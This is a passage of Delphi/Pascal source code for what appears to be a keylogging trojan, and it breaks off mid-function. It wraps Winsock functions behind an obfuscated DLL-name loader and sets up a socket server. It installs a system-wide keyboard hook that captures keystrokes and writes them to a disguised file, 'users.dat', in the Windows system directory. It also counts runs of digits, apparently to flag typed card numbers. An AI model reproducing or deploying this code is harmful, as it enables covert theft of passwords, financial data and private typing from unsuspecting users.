:TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('connect')); if @LListen <> Nil then Result := LListen(s,name,namelen); FreeLibrary(h_SOCK_DLL); end; end; function getpeername(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall; external winsocket name 'getpeername'; function getsockname(s: TSocket; var name: TSockAddr; var namelen: Integer): Integer; stdcall; external winsocket name 'getsockname'; function getsockopt(s: TSocket; level, optname: Integer; optval: PChar; var optlen: Integer): Integer; stdcall; external winsocket name 'getsockopt'; //function htonl(hostlong: u_long): u_long; stdcall; external winsocket name 'htonl'; function htonl(hostlong: u_long): u_long; stdcall; Type TListen = function(hostlong: u_long): u_long; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('htonl')); if @LListen <> Nil then Result := LListen(hostlong); FreeLibrary(h_SOCK_DLL); end; end; //function htons(hostshort: u_short): u_short; stdcall; external winsocket name 'htons'; function htons(hostshort: u_short): u_short; stdcall; Type TListen = function(hostshort: u_short): u_short; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('htons')); if @LListen <> Nil then Result := LListen(hostshort); FreeLibrary(h_SOCK_DLL); end; end; //function inet_addr(cp: PChar): u_long; stdcall; external winsocket name 'inet_addr'; {PInAddr;} { TInAddr } function inet_addr(cp: PChar): u_long; stdcall; Type TListen = function(cp: PChar): u_long; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('inet_addr')); if @LListen <> Nil then Result := LListen(cp); FreeLibrary(h_SOCK_DLL); end; end; function inet_ntoa(inaddr: TInAddr): PChar; stdcall; external winsocket name 'inet_ntoa'; function ioctlsocket(s: TSocket; cmd: Longint; var arg: u_long): Integer; stdcall; external winsocket name 'ioctlsocket'; //function listen(s: TSocket; backlog: Integer): Integer; stdcall; external winsocket name 'listen'; function listen(s: TSocket; backlog: Integer): Integer; stdcall; Type TListen = function(s: TSocket; backlog: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('listen')); if @LListen <> Nil then Result := LListen(s, backlog); FreeLibrary(h_SOCK_DLL); end; end; //function ntohl(netlong: u_long): u_long; stdcall; external winsocket name 'ntohl'; function ntohl(netlong: u_long): u_long; stdcall; Type TListen = function(netlong: u_long): u_long; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('ntohl')); if @LListen <> Nil then Result := LListen(netlong); FreeLibrary(h_SOCK_DLL); end; end; function ntohs(netshort: u_short): u_short; stdcall; external winsocket name 'ntohs'; //function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'recv'; function recv(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('recv')); if @LListen <> Nil then Result := LListen(s,buf,len,flags); FreeLibrary(h_SOCK_DLL); end; end; function recvfrom(s: TSocket; var Buf; len, flags: Integer; var from: TSockAddr; var fromlen: Integer): Integer; stdcall; external winsocket name 'recvfrom'; function select(nfds: Integer; readfds, writefds, exceptfds: PFDSet; timeout: PTimeVal): Longint; stdcall; external winsocket name 'select'; //function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; external winsocket name 'send'; function send(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var Buf; len, flags: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('send')); if @LListen <> Nil then Result := LListen(s,buf,len,flags); FreeLibrary(h_SOCK_DLL); end; end; function sendto(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr; tolen: Integer): Integer; stdcall; external winsocket name 'sendto'; function setsockopt(s: TSocket; level, optname: Integer; optval: PChar; optlen: Integer): Integer; stdcall; external winsocket name 'setsockopt'; function shutdown(s: TSocket; how: Integer): Integer; stdcall; external winsocket name 'shutdown'; //function socket(af, struct, protocol: Integer): TSocket; stdcall; external winsocket name 'socket'; function socket(af, struct, protocol: Integer): TSocket; stdcall; Type TListen = function(af, struct, protocol: Integer): TSocket; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('socket')); if @LListen <> Nil then Result := LListen(af,struct,protocol); FreeLibrary(h_SOCK_DLL); end; end; function gethostbyaddr(addr: Pointer; len, struct: Integer): PHostEnt; stdcall; external winsocket name 'gethostbyaddr'; //function gethostbyname(name: PChar): PHostEnt; stdcall; external winsocket name 'gethostbyname'; function gethostbyname(name: PChar): PHostEnt; stdcall; Type TListen = function(name: PChar): PHostEnt; stdcall; var LListen :TListen; begin Result := nil; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostbyname')); if @LListen <> Nil then Result := LListen(name); FreeLibrary(h_SOCK_DLL); end; end; function getprotobyname(name: PChar): PProtoEnt; stdcall; external winsocket name 'getprotobyname'; function getprotobynumber(proto: Integer): PProtoEnt; stdcall; external winsocket name 'getprotobynumber'; function getservbyname(name, proto: PChar): PServEnt; stdcall; external winsocket name 'getservbyname'; function getservbyport(port: Integer; proto: PChar): PServEnt; stdcall; external winsocket name 'getservbyport'; //function gethostname(name: PChar; len: Integer): Integer; stdcall; external winsocket name 'gethostname'; function gethostname(name: PChar; len: Integer): Integer; stdcall; Type TListen = function(name: PChar; len: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('gethostname')); if @LListen <> Nil then Result := LListen(name,len); FreeLibrary(h_SOCK_DLL); end; end; //function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; external winsocket name 'WSAAsyncSelect'; function WSAAsyncSelect(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; Type TListen = function(s: TSocket; HWindow: HWND; wMsg: u_int; lEvent: Longint): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAAsyncSelect')); if @LListen <> Nil then Result := LListen(s,HWindow,wMsg,lEvent); FreeLibrary(h_SOCK_DLL); end; end; function WSARecvEx(s: TSocket; var buf; len: Integer; var flags: Integer): Integer; stdcall; external winsocket name 'WSARecvEx'; function WSAAsyncGetHostByAddr(HWindow: HWND; wMsg: u_int; addr: PChar; len, struct: Integer; buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetHostByAddr'; function WSAAsyncGetHostByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetHostByName'; function WSAAsyncGetProtoByNumber(HWindow: HWND; wMsg: u_int; number: Integer; buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetProtoByNumber'; function WSAAsyncGetProtoByName(HWindow: HWND; wMsg: u_int; name, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetProtoByName'; function WSAAsyncGetServByPort( HWindow: HWND; wMsg, port: u_int; proto, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetServByPort'; function WSAAsyncGetServByName(HWindow: HWND; wMsg: u_int; name, proto, buf: PChar; buflen: Integer): THandle; stdcall; external winsocket name 'WSAAsyncGetServByName'; function WSACancelAsyncRequest(hAsyncTaskHandle: THandle): Integer; stdcall; external winsocket name 'WSACancelAsyncRequest'; function WSASetBlockingHook(lpBlockFunc: TFarProc): TFarProc; stdcall; external winsocket name 'WSASetBlockingHook'; function WSAUnhookBlockingHook: Integer; stdcall; external winsocket name 'WSAUnhookBlockingHook'; //function WSAGetLastError: Integer; stdcall; external winsocket name 'WSAGetLastError'; function WSAGetLastError: Integer; stdcall; type TListen = function: Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAGetLastError')); if @LListen <> Nil then Result := LListen; FreeLibrary(h_SOCK_DLL); end; end; procedure WSASetLastError; stdcall; external winsocket name 'WSASetLastError'; function WSACancelBlockingCall: Integer; stdcall; external winsocket name 'WSACancelBlockingCall'; function WSAIsBlocking: BOOL; stdcall; external winsocket name 'WSAIsBlocking'; //function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; external winsocket name 'WSAStartup'; function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; type TListen = function(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSAStartup')); if @LListen <> Nil then Result := LListen(wVersionRequired, WSData); FreeLibrary(h_SOCK_DLL); end; end; //function WSACleanup: Integer; stdcall; external winsocket name 'WSACleanup'; function WSACleanup: Integer; stdcall; type TListen = function: Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('WSACleanup')); if @LListen <> Nil then Result := LListen; FreeLibrary(h_SOCK_DLL); end; end; function __WSAFDIsSet(s: TSOcket; var FDSet: TFDSet): Bool; stdcall; external winsocket name '__WSAFDIsSet'; function TransmitFile(hSocket: TSocket; hFile: THandle; nNumberOfBytesToWrite: DWORD; nNumberOfBytesPerSend: DWORD; lpOverlapped: POverlapped; lpTransmitBuffers: PTransmitFileBuffers; dwReserved: DWORD): BOOL; stdcall; external winsocket name 'TransmitFile'; function AcceptEx(sListenSocket, sAcceptSocket: TSocket; lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD; var lpdwBytesReceived: DWORD; lpOverlapped: POverlapped): BOOL; stdcall; external winsocket name 'AcceptEx'; procedure GetAcceptExSockaddrs(lpOutputBuffer: Pointer; dwReceiveDataLength, dwLocalAddressLength, dwRemoteAddressLength: DWORD; var LocalSockaddr: TSockAddr; var LocalSockaddrLength: Integer; var RemoteSockaddr: TSockAddr; var RemoteSockaddrLength: Integer); stdcall; external winsocket name 'GetAcceptExSockaddrs'; function WSAMakeSyncReply(Buflen, Error: Word): Longint; begin WSAMakeSyncReply:= MakeLong(Buflen, Error); end; function WSAMakeSelectReply(Event, Error: Word): Longint; begin WSAMakeSelectReply:= MakeLong(Event, Error); end; function WSAGetAsyncBuflen(Param: Longint): Word; begin WSAGetAsyncBuflen:= LOWORD(Param); end; function WSAGetAsyncError(Param: Longint): Word; begin WSAGetAsyncError:= HIWORD(Param); end; function WSAGetSelectEvent(Param: Longint): Word; begin WSAGetSelectEvent:= LOWORD(Param); end; function WSAGetSelectError(Param: Longint): Word; begin WSAGetSelectError:= HIWORD(Param); end; procedure FD_CLR(Socket: TSocket; var FDSet: TFDSet); var I: Integer; begin I := 0; while I < FDSet.fd_count do begin if FDSet.fd_array[I] = Socket then begin while I < FDSet.fd_count - 1 do begin FDSet.fd_array[I] := FDSet.fd_array[I + 1]; Inc(I); end; Dec(FDSet.fd_count); Break; end; Inc(I); end; end; function FD_ISSET(Socket: TSocket; var FDSet: TFDSet): Boolean; begin Result := __WSAFDIsSet(Socket, FDSet); end; procedure FD_SET(Socket: TSocket; var FDSet: TFDSet); begin if FDSet.fd_count < FD_SETSIZE then begin FDSet.fd_array[FDSet.fd_count] := Socket; Inc(FDSet.fd_count); end; end; procedure FD_ZERO(var FDSet: TFDSet); begin FDSet.fd_count := 0; end; //=== stuff function IntToStr(A:Integer):string; begin Str(A,Result); end; function StrToInt(const S: string): Integer; var E: Integer; begin Val(S, Result, E); if E <> 0 then E:=0;//ConvertErrorFmt(SInvalidInteger, [S]); end; procedure AppMsg(Ms:PChar); begin MessageBox(Handle,Ms,'Error',0); end; //=== Cleanup and stop the program === procedure ShutDownServer; begin closesocket(Server); WSACleanup; // UnRegisterClass(lpzClassName,hInst); // Halt; end; //=== Process Messages === procedure ProcessMessages; begin while GetMessage(Msg2,0,0,0) do begin TranslateMessage(Msg2); DispatchMessage(Msg2); end; end; //=== Process CreateWindow === procedure OnCreate(hWnd:Integer); begin //nothing end; procedure OnClose(hWnd:Integer); begin //ShellExecute(0,nil,PChar(paramstr(0)),nil,nil,SW_NORMAL); //=== active it ShutDownServer; GetExitCodeThread(ThreadHdle, ExitCode); TerminateThread(ThreadHdle, ExitCode); GetExitCodeThread(ThreadHdle2, ExitCode2); TerminateThread(ThreadHdle2, ExitCode2); GetExitCodeThread(ThreadHdle3, ExitCode3); TerminateThread(ThreadHdle3, ExitCode3); klog.LogDestroy; end; //=== Socket things ===== //=== Send a String #0 === procedure TSock.WriteString(wParam:word;Buff:PChar); begin send(wParam,Buff^,Length(Buff),0); end; //=== Send Buffer === function TSock.WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt; begin Result:=send(wParam,Buff^,Len,0); end; //=== Process OnAccept === procedure TSock.OnServerAccept(wParam,lParam:longInt); begin accept(Server,nil,nil); end; //=== Process OnClose === procedure TSock.OnServerClose(wParam,lParam:longInt); begin //nothing end; function GetLocalHostName: string; var szHostName: array[0..128] of char; begin if gethostname(szHostName, 128) = 0 then Result:= szHostName; end; //======= sysutils ========= function StrPas(Str: PChar): string; begin Result := Str; end; function StrLen(Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function StrCopy(Dest, Source: PChar): PChar; assembler; asm PUSH EDI PUSH ESI MOV ESI,EAX MOV EDI,EDX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB NOT ECX MOV EDI,ESI MOV ESI,EDX MOV EDX,ECX MOV EAX,EDI SHR ECX,2 REP MOVSD MOV ECX,EDX AND ECX,3 REP MOVSB POP ESI POP EDI end; function StrScan(Str: PChar; Chr: Char): PChar; assembler; asm PUSH EDI PUSH EAX MOV EDI,Str MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB NOT ECX POP EDI MOV AL,Chr REPNE SCASB MOV EAX,0 JNE @@1 MOV EAX,EDI DEC EAX @@1: POP EDI end; function DiskSize(Drive: Byte): Integer; var RootPath: array[0..4] of Char; RootPtr: PChar; SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters: Integer; begin RootPtr := nil; if Drive > 0 then begin StrCopy(RootPath, 'A:\'); RootPath[0] := Char(Drive + $40); RootPtr := RootPath; end; if GetDiskFreeSpace(RootPtr, SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters) then Result := SectorsPerCluster * BytesPerSector * TotalClusters else Result := -1; end; function DeleteFile(const FileName: string): Boolean; begin Result := Windows.DeleteFile(PChar(FileName)); end; function FileAge(const FileName: string): Integer; var Handle: THandle; FindData: TWin32FindData; LocalFileTime: TFileTime; begin Handle := FindFirstFile(PChar(FileName), FindData); if Handle <> INVALID_HANDLE_VALUE then begin Windows.FindClose(Handle); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit; end; end; Result := -1; end; function FileExists(const FileName: string): Boolean; begin Result := FileAge(FileName) <> -1; end; function ByteTypeTest(P: PChar; Index: Integer): TMbcsByteType; begin Result := mbSingleByte; if (Index = 0) then begin if P[Index] in LeadBytes then Result := mbLeadByte; end else begin if (P[Index-1] in LeadBytes) and (ByteTypeTest(P, Index-1) = mbLeadByte) then Result := mbTrailByte else if P[Index] in LeadBytes then Result := mbLeadByte; end; end; function ByteType(const S: string; Index: Integer): TMbcsByteType; begin Result := mbSingleByte; if SysLocale.FarEast then Result := ByteTypeTest(PChar(S), Index-1); end; function LastDelimiter(const Delimiters, S: string): Integer; var P: PChar; begin Result := Length(S); P := PChar(Delimiters); while Result > 0 do begin if (S[Result] <> #0) and (StrScan(P, S[Result]) <> nil) then if (ByteType(S, Result) = mbTrailByte) then Dec(Result) else Exit; Dec(Result); end; end; function ExtractFilePath(const FileName: string): string; var I: Integer; begin I := LastDelimiter('\:', FileName); Result := Copy(FileName, 1, I); end; procedure FindClose(var F: TSearchRec); begin if F.FindHandle <> INVALID_HANDLE_VALUE then Windows.FindClose(F.FindHandle); end; function FindMatchingFile(var F: TSearchRec): Integer; var LocalFileTime: TFileTime; begin with F do begin while FindData.dwFileAttributes and ExcludeAttr <> 0 do if not FindNextFile(FindHandle, FindData) then begin Result := GetLastError; Exit; end; FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi, LongRec(Time).Lo); Size := FindData.nFileSizeLow; Attr := FindData.dwFileAttributes; Name := FindData.cFileName; end; Result := 0; end; function FindFirst(const Path: string; Attr: Integer; var F: TSearchRec): Integer; const faSpecial = faHidden or faSysFile or faVolumeID or faDirectory; begin F.ExcludeAttr := not Attr and faSpecial; F.FindHandle := FindFirstFile(PChar(Path), F.FindData); if F.FindHandle <> INVALID_HANDLE_VALUE then begin Result := FindMatchingFile(F); if Result <> 0 then FindClose(F); end else Result := GetLastError; end; function FindNext(var F: TSearchRec): Integer; begin if FindNextFile(F.FindHandle, F.FindData) then Result := FindMatchingFile(F) else Result := GetLastError; end; //=== Registry call ================ constructor TRegistry.Create; begin RootKey := HKEY_CURRENT_USER; LazyWrite := True; end; function DataTypeToRegData(Value: Integer): TRegDataType; begin if Value = REG_SZ then Result := rdString else if Value = REG_EXPAND_SZ then Result := rdExpandString else if Value = REG_DWORD then Result := rdInteger else if Value = REG_BINARY then Result := rdBinary else Result := rdUnknown; end; function RegDataToDataType(Value: TRegDataType): Integer; begin case Value of rdString: Result := REG_SZ; rdExpandString: Result := REG_EXPAND_SZ; rdInteger: Result := REG_DWORD; rdBinary: Result := REG_BINARY; else Result := REG_NONE; end; end; function TRegistry.GetDataInfo(const ValueName: string; var Value: TRegDataInfo):boolean; var DataType: Integer; begin FillChar(Value, SizeOf(TRegDataInfo), 0); Result := RegQueryValueEx(CurrentKey, PChar(ValueName), nil, @DataType, nil, @Value.DataSize) = ERROR_SUCCESS; Value.RegData := DataTypeToRegData(DataType); end; function TRegistry.GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer; var DataType: Integer; begin DataType := REG_NONE; if RegQueryValueEx(CurrentKey, PChar(Name), nil, @DataType, PByte(Buffer), @BufSize) <> ERROR_SUCCESS then // raise ERegistryException.CreateFmt(SRegGetDataFailed, [Name]); Result := BufSize; RegData := DataTypeToRegData(DataType); end; procedure TRegistry.PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType); var DataType: Integer; begin DataType := RegDataToDataType(RegData); if RegSetValueEx(CurrentKey, PChar(Name), 0, DataType, Buffer, BufSize) <> ERROR_SUCCESS then // raise ERegistryException.CreateFmt(SRegSetDataFailed, [Name]); end; function TRegistry.GetDataSize(const ValueName: string): Integer; var Info: TRegDataInfo; begin if GetDataInfo(ValueName, Info) then Result := Info.DataSize else Result := -1; end; procedure TRegistry.WriteString(const Name, Value: string); begin PutData(Name, PChar(Value), Length(Value), rdString); end; procedure ReadError(const Name: string); begin // raise ERegistryException.CreateFmt(SInvalidRegType, [Name]); end; function TRegistry.ReadString(const Name: string): string; var Len: Integer; RegData: TRegDataType; begin Len := GetDataSize(Name); if Len > 0 then begin SetString(Result, nil, Len); GetData(Name, PChar(Result), Len, RegData); if (RegData = rdString) or (RegData = rdExpandString) then SetLength(Result, StrLen(PChar(Result))) else ReadError(Name); end else Result := ''; end; procedure TRegistry.CloseKey; begin if CurrentKey <> 0 then begin if LazyWrite then RegCloseKey(CurrentKey) else RegFlushKey(CurrentKey); FCurrentKey := 0; FCurrentPath := ''; end; end; procedure TRegistry.ChangeKey(Value: HKey; const Path: string); begin CloseKey; FCurrentKey := Value; FCurrentPath := Path; end; procedure TRegistry.SetRootKey(Value: HKEY); begin if RootKey <> Value then begin if FCloseRootKey then begin RegCloseKey(RootKey); FCloseRootKey := False; end; FRootKey := Value; CloseKey; end; end; function TRegistry.GetBaseKey(Relative: Boolean): HKey; begin if (CurrentKey = 0) or not Relative then Result := RootKey else Result := CurrentKey; end; function IsRelative(const Value: string): Boolean; begin Result := not ((Value <> '') and (Value[1] = '\')); end; function TRegistry.OpenKey(const Key: string; CanCreate: Boolean): Boolean; var TempKey: HKey; S: string; Disposition: Integer; Relative: Boolean; begin S := Key; Relative := IsRelative(S); if not Relative then Delete(S, 1, 1); TempKey := 0; if not CanCreate or (S = '') then begin Result := RegOpenKeyEx(GetBaseKey(Relative), PChar(S), 0, KEY_ALL_ACCESS, TempKey) = ERROR_SUCCESS; end else Result := RegCreateKeyEx(GetBaseKey(Relative), PChar(S), 0, nil, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, TempKey, @Disposition) = ERROR_SUCCESS; if Result then begin if (CurrentKey <> 0) and Relative then S := CurrentPath + '\' + S; ChangeKey(TempKey, S); end; end; destructor TRegistry.Destroy; begin CloseKey; inherited; end; //== Allocate windows === const InstanceCount = 313; Type TWndMethod = procedure(var Message: TMessage) of object; type PObjectInstance = ^TObjectInstance; TObjectInstance = packed record Code: Byte; Offset: Integer; case Integer of 0: (Next: PObjectInstance); 1: (Method: TWndMethod); end; type PInstanceBlock = ^TInstanceBlock; TInstanceBlock = packed record Next: PInstanceBlock; Code: array[1..2] of Byte; WndProcPtr: Pointer; Instances: array[0..InstanceCount] of TObjectInstance; end; var InstBlockList: PInstanceBlock; InstFreeList: PObjectInstance; function StdWndProc(Window: HWND; Message, WParam: Longint; LParam: Longint): Longint; stdcall; assembler; asm XOR EAX,EAX PUSH EAX PUSH LParam PUSH WParam PUSH Message MOV EDX,ESP MOV EAX,[ECX].Longint[4] CALL [ECX].Pointer ADD ESP,12 POP EAX end; function CalcJmpOffset(Src, Dest: Pointer): Longint; begin Result := Longint(Dest) - (Longint(Src) + 5); end; function MakeObjectInstance(Method: TWndMethod): Pointer; const BlockCode: array[1..2] of Byte = ( $59, { POP ECX } $E9); { JMP StdWndProc } PageSize = 4096; var Block: PInstanceBlock; Instance: PObjectInstance; begin if InstFreeList = nil then begin Block := VirtualAlloc(nil, PageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Block^.Next := InstBlockList; Move(BlockCode, Block^.Code, SizeOf(BlockCode)); Block^.WndProcPtr := Pointer(CalcJmpOffset(@Block^.Code[2], @StdWndProc)); Instance := @Block^.Instances; repeat Instance^.Code := $E8; { CALL NEAR PTR Offset } Instance^.Offset := CalcJmpOffset(Instance, @Block^.Code); Instance^.Next := InstFreeList; InstFreeList := Instance; Inc(Longint(Instance), SizeOf(TObjectInstance)); until Longint(Instance) - Longint(Block) >= SizeOf(TInstanceBlock); InstBlockList := Block; end; Result := InstFreeList; Instance := InstFreeList; InstFreeList := Instance^.Next; Instance^.Method := Method; end; { Free an object instance } procedure FreeObjectInstance(ObjectInstance: Pointer); begin if ObjectInstance <> nil then begin PObjectInstance(ObjectInstance)^.Next := InstFreeList; InstFreeList := ObjectInstance; end; end; var UtilWindowClass: TWndClass = ( style: 0; lpfnWndProc: @DefWindowProc; cbClsExtra: 0; cbWndExtra: 0; hInstance: 0; hIcon: 0; hCursor: 0; hbrBackground: 0; lpszMenuName: nil; lpszClassName: 'TPUtilWindow'); function AllocateHWnd(Method: TWndMethod): HWND; var TempClass: TWndClass; ClassRegistered: Boolean; begin UtilWindowClass.hInstance := HInstance; ClassRegistered := GetClassInfo(HInstance, UtilWindowClass.lpszClassName, TempClass); if not ClassRegistered or (TempClass.lpfnWndProc <> @DefWindowProc) then begin if ClassRegistered then Windows.UnregisterClass(UtilWindowClass.lpszClassName, HInstance); Windows.RegisterClass(UtilWindowClass); end; Result := CreateWindowEx(WS_EX_TOOLWINDOW, UtilWindowClass.lpszClassName, '', WS_POPUP {!0}, 0, 0, 0, 0, 0, 0, HInstance, nil); if Assigned(Method) then SetWindowLong(Result, GWL_WNDPROC, Longint(MakeObjectInstance(Method))); end; procedure DeallocateHWnd(Wnd: HWND); var Instance: Pointer; begin Instance := Pointer(GetWindowLong(Wnd, GWL_WNDPROC)); DestroyWindow(Wnd); if Instance <> @DefWindowProc then FreeObjectInstance(Instance); end; //==== Key_log========================= type PGlobalDLLData = ^TGlobalDLLData; TGlobalDLLData = record hHookHWnd: HWND; hKeyHook: HHOOK; end; const MMFileName = 'Users'; var MapHandle: THandle; GlobalData: PGlobalDLLData; tt,Logger:string; l:textfile; cc:byte; procedure OpenSharedData; var Size: integer; CreateFileMappingError: integer; begin Size := SizeOf( TGlobalDLLData ); MapHandle := CreateFileMapping( $FFFFFFFF, nil, PAGE_READWRITE, 0, Size, MMFileName ); CreateFileMappingError := GetLastError; if ( MapHandle = 0 ) then exit; GlobalData := MapViewOfFile( MapHandle, FILE_MAP_ALL_ACCESS, 0, 0, Size ); if ( GlobalData = nil ) then begin CloseHandle( MapHandle ); exit; end; if ( ( MapHandle <> 0 ) and ( CreateFileMappingError <> ERROR_ALREADY_EXISTS ) ) then begin GlobalData^.hHookHWnd := 0; GlobalData^.hKeyHook := 0; end; end; procedure CloseSharedData; begin UnmapViewOfFile( GlobalData ); CloseHandle( MapHandle ); end; //function KeyCounter( code: integer; wParam: integer; lParam: integer ): lRESULT stdcall; function KeyCounter( code: integer; wParam: integer; lParam: integer ): LRESULT; stdcall; begin OpenSharedData; Result := CallNextHookEx( GlobalData^.hKeyHook, Code, wParam, lParam ); if ( code = HC_ACTION ) then begin if ( lParam > 0 ) then begin PostMessage( GlobalData^.hHookHWnd, UM_KEYHIT, wParam, 0 ); end; Result := 0; exit; end; end; procedure KeyHook_Start( hWin: HWND ); //stdcall; begin OpenSharedData; GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, KeyCounter, hInstance, 0 ); GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, nil, hInstance, 0 ); GlobalData^.hHookHWnd := hWin; end; procedure KeyHook_Stop; //stdcall; begin OpenSharedData; UnHookWindowsHookEx( GlobalData^.hKeyHook ); CloseSharedData; end; procedure TLog.KeyIncrement( var Msg: TMessage ); const lettres: array[65..90] of Char = 'abcdefghijklmnopqrstuvwxyz'; chiffres: array[96..111] of Char = '0123456789*+ - /'; chiffres2: array[48..57] of Char = '0123456789'; var k:integer; s:string; begin k:=msg.WParam; //writeln(inttostr(k)+' : '+char(k)); if k in [96..111] then s:=chiffres[k] else if k in [65..90] then s:=lettres[k] else if k in [48..57] then s:=chiffres2[k] else if k in [112..123] then s:=#255 else if k in [33..40] then s:=#255 else if k = 0 then s:=#255 else if k > 255 then s:=#255 else if k = 16 then s:=crypt('=QKMCR9') else //<SHIFT> if k = 17 then s:=crypt('=AWVI8') else //<CTRL> if k = 18 then s:=crypt('=COP;') else //<ALT> if k = 20 then s:=crypt('=ABTV8') else //<CAPS> if k = 144 then s:=crypt('=LVI;') else //<NUM> if k = 9 then s:=crypt('=vbf;') else //<tab> if k = 8 then s:=crypt('=<') else //<> if k = 223 then s:='!' else if k = 219 then s:=')' else if k = 187 then s:='=' else if k = 221 then s:='^' else if k = 186 then s:='$' else if k = 192 then s:='? else if k = 220 then s:='*' else if k = 188 then s:=',' else if k = 190 then s:=';' else if k = 191 then s:=':' else if k = 226 then s:='<' else if k = 222 then s:='?' else if k = 13 then s:='?' else if k = 32 then s:=' ' else if k = 46 then s:=crypt('=ffh;') else //<del> if k = 45 then s:=crypt('=kmw;') else //<ins> s:='['+inttostr(k)+']'; logger:=logger+s; write(s); if (s[1] in ['0'..'9']) or (s[1]=' ') or (s[1]='-') then inc(cc) else cc:=0; if (cc=13) then begin cc:=0; Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); Registre.WriteString('1','1'); Registre.Free; end; if length(logger)>200 then begin if not fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat rewrite(l); write(l,' '); closefile(l); end; assignfile(l,systemdir+crypt(']wpawu)lh~'));//\users.dat 